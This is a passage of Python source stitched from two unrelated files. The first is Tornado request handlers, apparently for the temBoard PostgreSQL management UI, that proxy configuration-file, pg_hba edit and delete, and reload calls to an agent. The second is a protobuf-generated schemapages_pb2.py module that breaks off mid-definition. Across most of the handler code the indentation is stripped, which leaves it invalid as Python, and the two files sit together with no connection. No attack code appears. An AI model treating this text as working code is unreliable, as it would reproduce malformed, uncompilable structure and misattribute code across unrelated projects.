'xsession': xsession,
'ret_post': ret_post
})
except (TemboardUIError, TemboardError, Exception) as e:
self.logger.exception(str(e))
self.logger.info("Failed.")
try:
self.db_session.expunge_all()
self.db_session.rollback()
self.db_session.close()
except Exception:
pass
if (isinstance(e, TemboardUIError) or
isinstance(e, TemboardError)):
if e.code == 401:
return HTMLAsyncResult(
http_code=401,
redirection="/server/%s/%s/login" %
(agent_address, agent_port))
elif e.code == 302:
return HTMLAsyncResult(http_code=401, redirection="/login")
code = e.code
else:
code = 500
return HTMLAsyncResult(
http_code=code,
template_file='error.html',
data={
'nav': True,
'role': role,
'instance': instance,
'code': e.code,
'error': e.message
})
@tornado.web.asynchronous
def post(self, agent_address, agent_port):
run_background(self.post_configuration_file, self.async_callback,
(agent_address, agent_port))
class ConfigurationFileVersioningHandler(BaseHandler):
    def check_etag_header(self):
"""
This is required because we don't want to return a 304 HTTP code when
clients send etag header (like jquery does on .load() calls).
"""
return False
def get_configuration_file(self, agent_address, agent_port):
try:
self.logger.info("Getting configuration (file).")
instance = None
role = None
self.load_auth_cookie()
self.start_db_session()
mode = self.get_argument('mode', None)
version = self.get_argument('version', None)
role = self.current_user
if not role:
raise TemboardUIError(302, "Current role unknown.")
if mode is None and len(self.available_modes) > 0:
mode = self.available_modes[0]
            if mode not in self.available_modes:
raise TemboardUIError(404, "Editing mode not available.")
instance = get_instance(self.db_session, agent_address, agent_port)
if not instance:
raise TemboardUIError(404, "Instance not found.")
if __name__ not in [plugin.plugin_name
for plugin in instance.plugins]:
raise TemboardUIError(408, "Plugin not active.")
self.db_session.expunge_all()
self.db_session.commit()
self.db_session.close()
xsession = self.get_secure_cookie(
"temboard_%s_%s" %
(instance.agent_address, instance.agent_port))
if not xsession:
raise TemboardUIError(401, "Authentication cookie is missing.")
file_versions = temboard_get_conf_file_versions(
self.ssl_ca_cert_file,
self.file_type,
instance.agent_address,
instance.agent_port,
xsession)
if mode == 'raw':
# Load file content.
conf_file_raw = temboard_get_conf_file_raw(
self.ssl_ca_cert_file,
self.file_type,
version,
instance.agent_address,
instance.agent_port,
xsession)
self.logger.info("Done.")
return HTMLAsyncResult(
http_code=200,
template_path=self.template_path,
template_file='edit_conf_file_raw.html',
data={
'nav': True,
'role': role,
'instance': instance,
'plugin': 'pgconf',
'file_versions': file_versions,
'file_type': self.file_type,
'conf_file_raw': conf_file_raw,
'xsession': xsession
})
if mode == 'advanced':
hba_options = None
if self.file_type == 'hba':
hba_options = temboard_get_hba_options(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession)
conf_file = temboard_get_conf_file(
self.ssl_ca_cert_file,
self.file_type,
version,
instance.agent_address,
instance.agent_port,
xsession)
self.logger.info("Done.")
return HTMLAsyncResult(
http_code=200,
template_path=self.template_path,
template_file='edit_conf_file_advanced.html',
data={
'nav': True,
'role': role,
'instance': instance,
'plugin': 'pgconf',
'file_versions': file_versions,
'file_type': self.file_type,
'conf_file': conf_file,
'hba_options': hba_options,
'xsession': xsession
})
except (TemboardUIError, TemboardError, Exception) as e:
self.logger.exception(str(e))
self.logger.info("Failed.")
try:
self.db_session.expunge_all()
self.db_session.rollback()
self.db_session.close()
except Exception:
pass
if (isinstance(e, TemboardUIError) or
isinstance(e, TemboardError)):
if e.code == 401:
return HTMLAsyncResult(
http_code=401,
redirection="/server/%s/%s/login" %
(agent_address, agent_port))
elif e.code == 302:
return HTMLAsyncResult(http_code=401, redirection="/login")
code = e.code
else:
code = 500
return HTMLAsyncResult(
http_code=code,
template_file='error.html',
data={
'nav': True,
'role': role,
'instance': instance,
'code': e.code,
'error': e.message
})
@tornado.web.asynchronous
def get(self, agent_address, agent_port):
run_background(self.get_configuration_file, self.async_callback,
(agent_address, agent_port))
def post_configuration_file(self, agent_address, agent_port):
error_code = None
error_message = None
ret_post = None
try:
self.logger.info("Posting configuration (file).")
instance = None
role = None
self.load_auth_cookie()
self.start_db_session()
role = self.current_user
if not role:
raise TemboardUIError(302, "Current role unknown.")
instance = get_instance(self.db_session, agent_address, agent_port)
if not instance:
raise TemboardUIError(404, "Instance not found.")
if __name__ not in [plugin.plugin_name
for plugin in instance.plugins]:
raise TemboardUIError(408, "Plugin not active.")
self.db_session.expunge_all()
self.db_session.commit()
self.db_session.close()
xsession = self.get_secure_cookie(
"temboard_%s_%s" %
(instance.agent_address, instance.agent_port))
if not xsession:
raise TemboardUIError(401, "Authentication cookie is missing.")
try:
# Send file content ..
ret_post = temboard_post_file_content(
self.ssl_ca_cert_file,
self.file_type,
instance.agent_address,
instance.agent_port,
xsession,
{
'content': self.request.arguments['content'][0],
'new_version': True
}
)
# .. and reload configuration.
ret_post = temboard_post_administration_control(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession,
{'action': 'reload'})
except (TemboardError, Exception) as e:
self.logger.exception(str(e))
                if isinstance(e, TemboardError):
error_code = e.code
error_message = e.message
else:
error_code = 500
                    error_message = "Internal error."
# Load file content.
file_content = temboard_get_file_content(
self.ssl_ca_cert_file,
self.file_type,
instance.agent_address,
instance.agent_port,
xsession)
self.logger.info("Done.")
return HTMLAsyncResult(
http_code=200,
template_path=self.template_path,
template_file='edit_file.html',
data={
'nav': True,
'role': role,
'instance': instance,
'plugin': 'pgconf',
'file_type': self.file_type,
'file_content': file_content,
'error_code': error_code,
'error_message': error_message,
'xsession': xsession,
'ret_post': ret_post
})
except (TemboardUIError, TemboardError, Exception) as e:
self.logger.exception(str(e))
self.logger.info("Failed.")
try:
self.db_session.expunge_all()
self.db_session.rollback()
self.db_session.close()
except Exception:
pass
if (isinstance(e, TemboardUIError) or
isinstance(e, TemboardError)):
if e.code == 401:
return HTMLAsyncResult(
http_code=401,
redirection="/server/%s/%s/login" %
(agent_address, agent_port))
elif e.code == 302:
return HTMLAsyncResult(http_code=401, redirection="/login")
code = e.code
else:
code = 500
return HTMLAsyncResult(
http_code=code,
template_file='error.html',
data={
'nav': True,
'role': role,
'instance': instance,
'code': e.code,
'error': e.message
})
@tornado.web.asynchronous
def post(self, agent_address, agent_port):
run_background(self.post_configuration_file, self.async_callback,
(agent_address, agent_port))
class HBAHandler(ConfigurationFileVersioningHandler):
file_type = 'hba'
available_modes = ['advanced', 'raw']
class PGIdentHandler(ConfigurationFileHandler):
file_type = 'pg_ident'
"""
Proxy Handlers
"""
class AdminControlProxyHandler(JsonHandler):
""" /administration/control JSON handler """
def post_control(self, agent_address, agent_port):
try:
self.logger.info("Posting control (proxy).")
instance = None
role = None
self.load_auth_cookie()
self.start_db_session()
role = self.current_user
if not role:
raise TemboardUIError(302, "Current role unknown.")
instance = get_instance(self.db_session, agent_address, agent_port)
if not instance:
raise TemboardUIError(404, "Instance not found.")
if __name__ not in [plugin.plugin_name
for plugin in instance.plugins]:
raise TemboardUIError(408, "Plugin not active.")
self.db_session.expunge_all()
self.db_session.commit()
self.db_session.close()
xsession = self.get_secure_cookie(
"temboard_%s_%s" %
(instance.agent_address, instance.agent_port))
if not xsession:
raise TemboardUIError(401, "Authentication cookie is missing.")
data = temboard_post_administration_control(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession,
tornado.escape.json_decode(self.request.body))
self.logger.info("Done.")
return JSONAsyncResult(http_code=200, data=data)
except (TemboardUIError, TemboardError, Exception) as e:
self.logger.exception(str(e))
self.logger.info("Failed.")
try:
self.db_session.close()
except Exception:
pass
if (isinstance(e, TemboardUIError) or
isinstance(e, TemboardError)):
return JSONAsyncResult(http_code=e.code,
data={'error': e.message})
else:
return JSONAsyncResult(http_code=500,
data={'error': e.message})
@tornado.web.asynchronous
def post(self, agent_address, agent_port):
run_background(self.post_control, self.async_callback,
(agent_address, agent_port))


class ConfigurationProxyHandler(JsonHandler):
    """ /pgconf/configuration JSON handler """

    def post_configuration(self, agent_address, agent_port):
        try:
            self.logger.info("Posting configuration (proxy).")
            instance = None
            role = None
            self.load_auth_cookie()
            self.start_db_session()
            role = self.current_user
            if not role:
                raise TemboardUIError(302, "Current role unknown.")
            instance = get_instance(self.db_session, agent_address, agent_port)
            if not instance:
                raise TemboardUIError(404, "Instance not found.")
            if __name__ not in [plugin.plugin_name
                                for plugin in instance.plugins]:
                raise TemboardUIError(408, "Plugin not active.")
            self.db_session.expunge_all()
            self.db_session.commit()
            self.db_session.close()
            xsession = self.get_secure_cookie(
                "temboard_%s_%s" %
                (instance.agent_address, instance.agent_port))
            if not xsession:
                raise TemboardUIError(401, "Authentication cookie is missing.")
            data = temboard_post_configuration(
                self.ssl_ca_cert_file,
                agent_address,
                agent_port,
                xsession,
                tornado.escape.json_decode(self.request.body))
            self.logger.info("Done.")
            return JSONAsyncResult(http_code=200, data=data)
        except (TemboardUIError, TemboardError, Exception) as e:
            self.logger.exception(str(e))
            self.logger.info("Failed.")
            try:
                self.db_session.close()
            except Exception:
                pass
            if isinstance(e, (TemboardUIError, TemboardError)):
                return JSONAsyncResult(http_code=e.code,
                                       data={'error': e.message})
            else:
                return JSONAsyncResult(http_code=500,
                                       data={'error': e.message})

    @tornado.web.asynchronous
    def post(self, agent_address, agent_port):
        run_background(self.post_configuration, self.async_callback,
                       (agent_address, agent_port))


class HBAOptionsProxyHandler(JsonHandler):

    def get_hba_options(self, agent_address, agent_port):
        try:
            self.logger.info("Getting HBA options (proxy).")
            role = None
            instance = None
            self.load_auth_cookie()
            self.start_db_session()
            role = self.current_user
            if not role:
                raise TemboardUIError(302, "Current role unknown.")
            instance = get_instance(self.db_session, agent_address, agent_port)
            if not instance:
                raise TemboardUIError(404, "Instance not found.")
            if __name__ not in [plugin.plugin_name
                                for plugin in instance.plugins]:
                raise TemboardUIError(408, "Plugin not activated.")
            self.db_session.expunge_all()
            self.db_session.commit()
            self.db_session.close()
            xsession = self.request.headers.get('X-Session')
            if not xsession:
                raise TemboardUIError(401, 'X-Session header missing')
            hba_options = temboard_get_hba_options(
                self.ssl_ca_cert_file, instance.agent_address,
                instance.agent_port, xsession)
            self.logger.info("Done.")
            return JSONAsyncResult(http_code=200, data=hba_options)
        except (TemboardUIError, TemboardError, Exception) as e:
            self.logger.exception(str(e))
            self.logger.info("Failed.")
            try:
                self.db_session.close()
            except Exception:
                pass
            if isinstance(e, (TemboardUIError, TemboardError)):
                return JSONAsyncResult(http_code=e.code,
                                       data={'error': e.message})
            else:
                return JSONAsyncResult(http_code=500,
                                       data={'error': e.message})

    @tornado.web.asynchronous
    def get(self, agent_address, agent_port):
        run_background(self.get_hba_options, self.async_callback,
                       (agent_address, agent_port))


class HBAProxyHandler(JsonHandler):

    def post_hba(self, agent_address, agent_port):
        try:
            self.logger.info("Posting HBA (proxy).")
            instance = None
            role = None
            self.load_auth_cookie()
            self.start_db_session()
            role = self.current_user
            if not role:
                raise TemboardUIError(302, "Current role unknown.")
            instance = get_instance(self.db_session, agent_address, agent_port)
            if not instance:
                raise TemboardUIError(404, "Instance not found.")
            if __name__ not in [plugin.plugin_name
                                for plugin in instance.plugins]:
                raise TemboardUIError(408, "Plugin not active.")
            self.db_session.expunge_all()
            self.db_session.commit()
            self.db_session.close()
            xsession = self.get_secure_cookie(
                "temboard_%s_%s" %
                (instance.agent_address, instance.agent_port))
            if not xsession:
                raise TemboardUIError(401, "Authentication cookie is missing.")
            data = temboard_post_conf_file(
                self.ssl_ca_cert_file,
                'hba',
                instance.agent_address,
                instance.agent_port,
                xsession,
                tornado.escape.json_decode(self.request.body))
            # And reload postgresql configuration.
            temboard_post_administration_control(
                self.ssl_ca_cert_file,
                instance.agent_address,
                instance.agent_port,
                xsession,
                {'action': 'reload'})
            self.logger.info("Done.")
            return JSONAsyncResult(http_code=200, data=data)
        except (TemboardUIError, TemboardError, Exception) as e:
            self.logger.exception(str(e))
            self.logger.info("Failed.")
            try:
                self.db_session.close()
            except Exception:
                pass
            if isinstance(e, (TemboardUIError, TemboardError)):
                return JSONAsyncResult(http_code=e.code,
                                       data={'error': e.message})
            else:
                return JSONAsyncResult(http_code=500,
                                       data={'error': e.message})

    @tornado.web.asynchronous
    def post(self, agent_address, agent_port):
        run_background(self.post_hba, self.async_callback,
                       (agent_address, agent_port))


class HBADeleteProxyHandler(JsonHandler):

    def delete_hba(self, agent_address, agent_port):
        try:
            self.logger.info("Deleting HBA (proxy).")
            instance = None
            role = None
            self.load_auth_cookie()
            self.start_db_session()
            role = self.current_user
            if not role:
                raise TemboardUIError(302, "Current role unknown.")
            instance = get_instance(self.db_session, agent_address, agent_port)
            if not instance:
                raise TemboardUIError(404, "Instance not found.")
            if __name__ not in [plugin.plugin_name
                                for plugin in instance.plugins]:
                raise TemboardUIError(408, "Plugin not active.")
            self.db_session.expunge_all()
            self.db_session.commit()
            self.db_session.close()
            xsession = self.get_secure_cookie(
                "temboard_%s_%s" %
                (instance.agent_address, instance.agent_port))
            if not xsession:
                raise TemboardUIError(401, "Authentication cookie is missing.")
            res = temboard_delete_hba_version(
                self.ssl_ca_cert_file,
                instance.agent_address,
                instance.agent_port,
                xsession,
                self.get_argument('version', None))
            self.logger.info("Done.")
            return JSONAsyncResult(http_code=200, data=res)
        except (TemboardUIError, TemboardError, Exception) as e:
            self.logger.exception(str(e))
            self.logger.info("Failed.")
            try:
                self.db_session.close()
            except Exception:
                pass
            if isinstance(e, (TemboardUIError, TemboardError)):
                return JSONAsyncResult(http_code=e.code,
                                       data={'error': e.message})
            else:
                return JSONAsyncResult(http_code=500,
                                       data={'error': e.message})

    @tornado.web.asynchronous
    def get(self, agent_address, agent_port):
        run_background(self.delete_hba, self.async_callback,
                       (agent_address, agent_port))
# SchemaPages/schemapages_pb2.py
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: schemapages.proto
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()

DESCRIPTOR = _descriptor.FileDescriptor(
  name='schemapages.proto',
  package='SchemaPages',
  syntax='proto2',
  serialized_options=None,
  create_key=_descriptor._internal_create_key,
  serialized_pb=(
    b'\n\x11schemapages.proto\x12\x0bSchemaPages\"\x1e\n\tSuperPath\x12\x11\n\tsuperPath\x18\x01 \x03(\t\"\x97\x02\n\x07SDOTerm\x12\'\n\x08termType\x18\x01 \x02(\x0e\x32\x15.SchemaPages.TermType\x12\x0b\n\x03uri\x18\x02 \x02(\t\x12\r\n\x05label\x18\x04 \x02(\t\x12*\n\nsuperPaths\x18\x06 \x03(\x0b\x32\x16.SchemaPages.SuperPath\x12\x18\n\x10\x61\x63knowledgements\x18\x05 \x03(\t\x12\x0f\n\x07\x63omment\x18\x07 \x02(\t\x12\x13\n\x0b\x65quivalents\x18\x08 \x03(\t\x12\x0f\n\x07pending\x18\t \x02(\x08\x12\x0f\n\x07retired\x18\n \x02(\x08\x12\x14\n\x0csupersededBy\x18\x0b \x01(\t\x12\x12\n\nsupersedes\x18\x0c \x03(\t\x12\x0f\n\x07sources\x18\r \x03(\t\"\xd8\x01\n\x0bSDOBaseType\x12\n\n\x02id\x18\x01 \x02(\t\x12,\n\x0etermdescriptor\x18\x02 \x03(\x0b\x32\x14.SchemaPages.SDOTerm\x12\x12\n\nproperties\x18\x03 \x03(\t\x12\x15\n\rallproperties\x18\x04 \x03(\t\x12\x17\n\x0f\x65xpectedTypeFor\x18\x05 \x03(\t\x12\x1a\n\x12\x65numerationMembers\x18\x06 \x03(\t\x12\x0c\n\x04subs\x18\t \x03(\t\x12\x0e\n\x06supers\x18\n \x03(\t\x12\x11\n\ttermStack\x18\x0b \x03(\t\"\xb8\x01\n\x0bSDOProperty\x12\n\n\x02id\x18\x01 \x02(\t\x12,\n\x0etermdescriptor\x18\x02 \x03(\x0b\x32\x14.SchemaPages.SDOTerm\x12\x16\n\x0e\x64omainIncludes\x18\x03 \x03(\t\x12\x15\n\rrangeIncludes\x18\x04 \x03(\t\x12\x0f\n\x07inverse\x18\x05 \x02(\t\x12\x0c\n\x04subs\x18\x06 \x03(\t\x12\x0e\n\x06supers\x18\x07 \x03(\t\x12\x11\n\ttermStack\x18\x08 \x03(\t\"j\n\x13SDOEnumerationValue\x12\n\n\x02id\x18\x01 \x02(\t\x12,\n\x0etermdescriptor\x18\x02 \x03(\x0b\x32\x14.SchemaPages.SDOTerm\x12\x19\n\x11\x65numerationParent\x18\x03 \x02(\t\"\'\n\x0cSDOReference\x12\n\n\x02id\x18\x01 \x02(\t\x12\x0b\n\x03uri\x18\x02 \x02(\t\"\xa8\x02\n\x13SDOBaseTypeExpanded\x12\n\n\x02id\x18\x01 \x02(\t\x12,\n\x0etermdescriptor\x18\x02 \x03(\x0b\x32\x14.SchemaPages.SDOTerm\x12,\n\nproperties\x18\x03 \x03(\x0b\x32\x18.SchemaPages.SDOProperty\x12\x31\n\x0f\x65xpectedTypeFor\x18\x04 '
    b'\x03(\x0b\x32\x18.SchemaPages.SDOProperty\x12\x1a\n\x12\x65numerationMembers\x18\x05 \x03(\t\x12\x0c\n\x04subs\x18\x06 \x03(\t\x12\x0e\n\x06supers\x18\x07 \x03(\t\x12<\n\ttermStack\x18\x08 \x03(\x0b\x32).SchemaPages.SDOBaseTypeExpandedPropsOnly\"\x86\x02\n\x1cSDOBaseTypeExpandedPropsOnly\x12\n\n\x02id\x18\x01 \x02(\t\x12,\n\x0etermdescriptor\x18\x02 \x03(\x0b\x32\x14.SchemaPages.SDOTerm\x12,\n\nproperties\x18\x03 \x03(\x0b\x32\x18.SchemaPages.SDOProperty\x12\x31\n\x0f\x65xpectedTypeFor\x18\x04 \x03(\x0b\x32\x18.SchemaPages.SDOProperty\x12\x1a\n\x12\x65numerationMembers\x18\x05 \x03(\t\x12\x0c\n\x04subs\x18\x06 \x03(\t\x12\x0e\n\x06supers\x18\x07 \x03(\t\x12\x11\n\ttermStack\x18\x08 \x03(\t*f\n\x08TermType\x12\x08\n\x04TYPE\x10\x00\x12\x0c\n\x08PROPERTY\x10\x01\x12\x0c\n\x08\x44\x41TATYPE\x10\x02\x12\x0f\n\x0b\x45NUMERATION\x10\x03\x12\x14\n\x10\x45NUMERATIONVALUE\x10\x04\x12\r\n\tREFERENCE\x10\x05')
)

_TERMTYPE = _descriptor.EnumDescriptor(
  name='TermType',
  full_name='SchemaPages.TermType',
  filename=None,
  file=DESCRIPTOR,
  create_key=_descriptor._internal_create_key,
  values=[
    _descriptor.EnumValueDescriptor(
      name='TYPE', index=0, number=0,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='PROPERTY', index=1, number=1,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='DATATYPE', index=2, number=2,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='ENUMERATION', index=3, number=3,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='ENUMERATIONVALUE', index=4, number=4,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='REFERENCE', index=5, number=5,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
  ],
  containing_type=None,
  serialized_options=None,
  serialized_start=1467,
  serialized_end=1569,
)
_sym_db.RegisterEnumDescriptor(_TERMTYPE)

TermType = enum_type_wrapper.EnumTypeWrapper(_TERMTYPE)
TYPE = 0
PROPERTY = 1
DATATYPE = 2
ENUMERATION = 3
ENUMERATIONVALUE = 4
REFERENCE = 5

_SUPERPATH = _descriptor.Descriptor(
  name='SuperPath',
  full_name='SchemaPages.SuperPath',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='superPath', full_name='SchemaPages.SuperPath.superPath', index=0,
      number=1, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=34,
  serialized_end=64,
)

_SDOTERM = _descriptor.Descriptor(
  name='SDOTerm',
  full_name='SchemaPages.SDOTerm',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='termType', full_name='SchemaPages.SDOTerm.termType', index=0,
      number=1, type=14, cpp_type=8, label=2,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='uri', full_name='SchemaPages.SDOTerm.uri', index=1,
      number=2, type=9, cpp_type=9, label=2,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='label', full_name='SchemaPages.SDOTerm.label', index=2,
      number=4, type=9, cpp_type=9, label=2,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='superPaths', full_name='SchemaPages.SDOTerm.superPaths', index=3,
      number=6, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='acknowledgements', full_name='SchemaPages.SDOTerm.acknowledgements', index=4,
      number=5, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='comment', full_name='SchemaPages.SDOTerm.comment', index=5,
      number=7, type=9, cpp_type=9, label=2,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='equivalents', full_name='SchemaPages.SDOTerm.equivalents', index=6,
      number=8, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='pending', full_name='SchemaPages.SDOTerm.pending', index=7,
      number=9, type=8, cpp_type=7, label=2,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='retired', full_name='SchemaPages.SDOTerm.retired', index=8,
      number=10, type=8, cpp_type=7, label=2,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='supersededBy', full_name='SchemaPages.SDOTerm.supersededBy', index=9,
      number=11, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='supersedes', full_name='SchemaPages.SDOTerm.supersedes', index=10,
      number=12, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='sources', full_name='SchemaPages.SDOTerm.sources', index=11,
      number=13, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=67,
  serialized_end=346,
)

_SDOBASETYPE = _descriptor.Descriptor(
  name='SDOBaseType',
  full_name='SchemaPages.SDOBaseType',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='id', full_name='SchemaPages.SDOBaseType.id', index=0,
      number=1, type=9, cpp_type=9, label=2,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='termdescriptor', full_name='SchemaPages.SDOBaseType.termdescriptor', index=1,
      number=2, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='properties', full_name='SchemaPages.SDOBaseType.properties', index=2,
      number=3, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='allproperties', full_name='SchemaPages.SDOBaseType.allproperties', index=3,
      number=4, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='expectedTypeFor', full_name='SchemaPages.SDOBaseType.expectedTypeFor', index=4,
      number=5, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='enumerationMembers', full_name='SchemaPages.SDOBaseType.enumerationMembers', index=5,
      number=6, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='subs', full_name='SchemaPages.SDOBaseType.subs', index=6,
      number=9, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='supers', full_name='SchemaPages.SDOBaseType.supers', index=7,
      number=10, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='termStack', full_name='SchemaPages.SDOBaseType.termStack', index=8,
      number=11, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=349,
  serialized_end=565,
)

_SDOPROPERTY = _descriptor.Descriptor(
  name='SDOProperty',
  full_name='SchemaPages.SDOProperty',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='id', full_name='SchemaPages.SDOProperty.id', index=0,
      number=1, type=9, cpp_type=9, label=2,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='termdescriptor', full_name='SchemaPages.SDOProperty.termdescriptor', index=1,
      number=2, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='domainIncludes', full_name='SchemaPages.SDOProperty.domainIncludes', index=2,
      number=3, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
